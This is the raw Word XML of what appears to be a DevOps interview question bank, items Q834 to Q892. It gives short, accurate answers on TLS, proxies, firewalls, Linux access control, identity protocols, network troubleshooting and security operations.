        <w:t>A: TLS is a cryptographic protocol that secures network communication using encryption, certificate validation, and integrity checks. It replaced older SSL versions and is used by HTTPS, mTLS, and many service-to-service connections.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>TLS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Q835. Explain SSL handshake.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The SSL/TLS handshake negotiates protocol version, cipher suites, certificates, keys, and session parameters before encrypted traffic begins. In troubleshooting, check certificate validity, trust chains, SNI, protocol support, and time sync.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>SSL Handshake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Q836. What is load balancing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Load balancing distributes traffic across multiple backend instances. It improves availability, scalability, and fault tolerance using algorithms such as round robin, least connections, hash-based routing, and health checks.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Load Balancing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Q837. Explain reverse proxy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A reverse proxy sits in front of backend services and forwards client requests to them. It can provide TLS termination, routing, caching, compression, authentication, and rate limiting.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Reverse Proxy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Q838. What is NGINX?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: NGINX is a high-performance web server and reverse proxy. It is commonly used for static hosting, ingress, TLS termination, load balancing, caching, and API routing.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Nginx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Q839. Explain HAProxy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: HAProxy is a reliable TCP and HTTP load balancer and reverse proxy. It is widely used for high-availability traffic routing, health checks, SSL termination, and advanced load-balancing rules.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Haproxy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Q840. What is firewall?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A firewall controls network traffic based on rules such as source, destination, port, protocol, and connection state. It reduces exposure and enforces network security boundaries.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Firewall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Q841. Explain iptables.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: iptables is a Linux firewall tool for managing packet filtering and NAT rules using netfilter. It is powerful but can be complex, and many modern systems are moving toward nftables.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Iptables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Q842. What is nftables?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: nftables is the modern Linux packet filtering framework that replaces iptables, ip6tables, arptables, and ebtables. It provides a cleaner syntax and more efficient rule management.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Nftables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Q843. Explain SELinux.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: SELinux is a Linux mandatory access control system that enforces security policies beyond traditional permissions. It can restrict what processes can access even if they run as root.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Selinux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Q844. What is AppArmor?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: AppArmor is a Linux mandatory access control system that confines programs using profiles. It limits file, network, and capability access to reduce damage from compromised processes.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Apparmor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Q845. Explain PAM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: PAM, or Pluggable Authentication Modules, provides a flexible framework for Linux authentication. It controls login rules, password policies, MFA integrations, and access restrictions.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Pam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Q846. What is LDAP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: LDAP is a protocol for accessing directory services that store users, groups, and organizational data. Enterprises use it for centralized identity and authentication.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Ldap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Q847. Explain OAuth2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: OAuth2 is an authorization framework that lets applications access resources on behalf of users without sharing passwords. It uses flows, tokens, scopes, clients, and authorization servers.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Oauth2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Q848. What is OpenID Connect?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: OpenID Connect is an identity layer built on OAuth2. It provides authentication and user identity through ID tokens, commonly used for SSO.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Openid Connect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Q849. Explain JWT.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: JWT is a compact signed token format used to transmit claims between parties. It is common in authentication and authorization, but must be validated for signature, issuer, audience, expiry, and algorithm.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Jwt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Q850. What is SSO?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: SSO, or Single Sign-On, lets users authenticate once and access multiple applications. It improves usability and centralized access control through identity providers using SAML or OpenID Connect.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Sso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Q851. Explain VPN.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A VPN creates an encrypted tunnel between networks or devices. It is used for private access, site-to-site connectivity, remote work, and secure traffic over untrusted networks.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Vpn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Q852. What is subnetting?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Subnetting divides an IP network into smaller logical networks. It improves address management, routing control, segmentation, and security.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Subnetting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Q853. Explain CIDR.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: CIDR represents IP network ranges using prefix notation such as 10.0.0.0/24. Smaller prefix numbers represent larger networks.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cidr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Q854. What is NAT?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: NAT translates IP addresses, often allowing private internal addresses to access external networks through a shared public address. It is also used for inbound port forwarding and network isolation.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Nat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Q855. Explain routing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Routing decides how packets move between networks. Routers use routing tables, static routes, and dynamic protocols such as BGP or OSPF to choose next hops.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Routing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Q856. What is BGP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: BGP is the routing protocol used to exchange routes between autonomous systems on the internet and large private networks. It is powerful for multi-homing and traffic control but requires careful policy management.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Bgp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Q857. Explain VLAN.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A VLAN logically separates network traffic at Layer 2 on shared switches. It improves segmentation, security, and broadcast-domain control.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Vlan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Q858. What is VXLAN?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: VXLAN extends Layer 2 networks over Layer 3 using encapsulation. It is common in data centers and Kubernetes networking for scalable overlays.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Vxlan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Q859. Explain packet capture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Packet capture records network packets for analysis. It helps troubleshoot latency, drops, DNS problems, TLS handshakes, retransmissions, and protocol issues.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Packet Capture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Q860. What is tcpdump?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: tcpdump is a command-line packet capture tool. It is used to inspect traffic with filters for hosts, ports, protocols, and interfaces.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Tcpdump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Q861. Explain Wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Wireshark is a graphical packet analysis tool. It decodes protocols and helps investigate network behavior, latency, retransmissions, DNS, TLS, and application traffic.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Wireshark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Q862. What is netstat?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: netstat displays network connections, listening ports, routing tables, and interface statistics. On modern Linux systems, ss is often preferred.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Netstat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Q863. Explain ss command.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The ss command displays socket information such as listening ports, established connections, and TCP states. It is faster and more modern than netstat.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Ss Command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Q864. What is traceroute?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: traceroute shows the network path packets take to a destination by listing intermediate hops. It helps identify routing problems, latency jumps, and packet loss points.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Traceroute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Q865. Explain ping troubleshooting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Ping troubleshooting checks basic reachability and latency using ICMP. If ping fails, verify DNS resolution, routing, firewall rules, security groups, host status, and whether ICMP is blocked.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Ping Troubleshooting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Q866. What is DNS propagation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: DNS propagation is the time it takes for DNS record changes to be visible across recursive resolvers and caches. TTL values strongly influence how quickly changes are observed.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>DNS Propagation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Q867. Explain split horizon DNS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Split horizon DNS returns different DNS answers based on the requester’s network location. It is commonly used to provide private internal addresses to internal clients and public addresses to external clients.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Split Horizon DNS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Q868. What is certificate management?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Certificate management handles issuing, renewing, rotating, storing, and revoking TLS certificates. Automation is important because expired or misconfigured certificates can cause outages.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Certificate Management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Q869. Explain Let’s Encrypt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Let’s Encrypt is a free certificate authority that provides automated TLS certificates. It is commonly integrated with ACME clients such as Certbot or Kubernetes cert-manager.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Let’s Encrypt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Q870. Explain secrets management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Secrets management securely stores, accesses, rotates, and audits sensitive values such as passwords, tokens, certificates, and keys. Good practice avoids secrets in code, Git, images, and logs.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Secrets Management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Q871. What is Vault?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Vault is HashiCorp’s secrets management tool for storing static secrets, generating dynamic credentials, encrypting data, issuing certificates, and auditing access.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Vault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Q872. Explain encryption at rest.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Encryption at rest protects stored data on disks, databases, object storage, backups, and snapshots. It should include key management, access control, rotation, and audit logging.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Encryption At Rest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Q873. What is encryption in transit?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Encryption in transit protects data moving over networks, usually with TLS or mTLS. It prevents eavesdropping, tampering, and impersonation.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Encryption In Transit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Q874. Explain IAM principles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: IAM principles include least privilege, separation of duties, strong identity, MFA, role-based access, periodic review, short-lived credentials, and auditability.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>IAM Principles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Q875. Explain zero trust.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Zero trust assumes no network, user, or workload is trusted by default. Access is continuously verified using identity, device posture, context, least privilege, segmentation, and monitoring.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Zero Trust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Q876. What is SOC?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A SOC, or Security Operations Center, monitors, detects, investigates, and responds to security threats. It uses alerts, SIEM data, threat intelligence, incident runbooks, and response workflows.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Soc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Q877. Explain SIEM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: SIEM collects and correlates security logs from many systems to detect suspicious activity. It supports alerting, investigation, compliance reporting, and incident response.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Siem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Q878. What is IDS/IPS?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: IDS detects suspicious network or host activity, while IPS can actively block it. They are used to identify attacks, policy violations, and anomalous behavior.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Ids/ips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Q879. Explain DDoS mitigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: DDoS mitigation protects services from traffic floods using rate limiting, traffic scrubbing, CDN or edge protection, autoscaling, WAF rules, and upstream provider controls.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Ddos Mitigation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Q880. What is vulnerability management?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Vulnerability management is the continuous process of discovering, prioritizing, remediating, and tracking security vulnerabilities. It combines scanning, asset inventory, risk scoring, patching, and exception handling.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Vulnerability Management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Q881. Explain CVE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A CVE is a publicly identified cybersecurity vulnerability with a unique identifier. Teams use CVEs to track exposure, severity, affected versions, and remediation actions.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cve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Q882. What is patch management?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Patch management is the process of testing, approving, deploying, and verifying software and OS updates. It reduces security risk and operational instability.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Patch Management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Q883. Explain threat modeling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Threat modeling identifies possible threats, attack paths, assets, trust boundaries, and mitigations before or during system design. It helps teams build security into architecture early.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Threat Modeling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Q884. What is RBAC security?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: RBAC security grants permissions based on roles assigned to users, groups, or service accounts. It simplifies access management and supports least privilege when roles are scoped carefully.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>RBAC Security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Q885. Explain ABAC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: ABAC, or Attribute-Based Access Control, makes authorization decisions using attributes such as user role, resource type, location, device, time, and sensitivity. It is more dynamic than simple role-based access.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>ABAC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Q886. What is network segmentation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Network segmentation divides infrastructure into isolated zones or subnets. It limits lateral movement, reduces blast radius, and allows different security policies for different workloads.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Network Segmentation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Q887. Explain bastion hosts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Bastion hosts are hardened jump points used to access private systems from controlled networks. They should enforce MFA, logging, least privilege, and restricted inbound access.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Bastion Hosts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Q888. What is jump server?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A jump server is an intermediate system used to access private servers that are not directly exposed. It centralizes administrative access and auditing.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Jump Server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Q889. Explain SSH hardening.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: SSH hardening reduces remote access risk by disabling password login, using key-based auth, enforcing MFA where possible, limiting users, disabling root login, rotating keys, and monitoring access logs.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>SSH Hardening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Q890. What is kernel panic?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A kernel panic is a serious OS failure where the Linux kernel cannot continue safely. Causes include hardware faults, bad drivers, corrupted filesystems, kernel bugs, or memory issues.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Kernel Panic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Q891. Explain memory leaks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A memory leak occurs when a process keeps allocating memory without releasing it. In production it causes rising memory usage, swapping, OOM kills, latency, and instability.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Memory Leaks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Q892. What is CPU steal?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: CPU steal is time when a virtual machine is ready to run but the hypervisor schedules another VM on the physical CPU. High steal indicates noisy neighbors or overloaded hosts.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
